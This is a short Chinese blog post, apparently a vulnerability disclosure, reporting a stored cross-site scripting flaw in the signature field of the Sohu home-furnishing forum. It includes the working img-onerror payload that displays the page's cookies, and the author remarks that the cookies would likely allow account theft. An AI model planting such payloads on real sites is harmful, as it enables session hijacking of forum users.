随便找一个论坛链接   http://home.focus.cn/msgview/1632/270131257.html       在个人签名处输入: 搜狐家居论坛有一个通杀所有子论坛的xss – 网站插图   搜狐家居论坛有一个通杀所有子论坛的xss – 网站插图1 <p>   <img height="0" onerror="alert(/亲,这里有个xss 漏洞你们知道吗/);alert(document.cookie)" src="#" width="0" />这个人很懒,留下个弹窗</p>   弹个小窗   搜狐家居论坛有一个通杀所有子论坛的xss – 网站插图2     cookie很多料,估计可盗号(没试,纯YY)  

搜狐家居论坛有一个通杀所有子论坛的xss – 网站插图3

    上一篇: TCCMS某处设计缺陷,成功打入官网后台 - 网站安全

    下一篇: 腾讯视频主站分享至微信xss一枚,可cookie哦!
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《搜狐家居论坛有一个通杀所有子论坛的xss – 网站
   

还没有人抢沙发呢~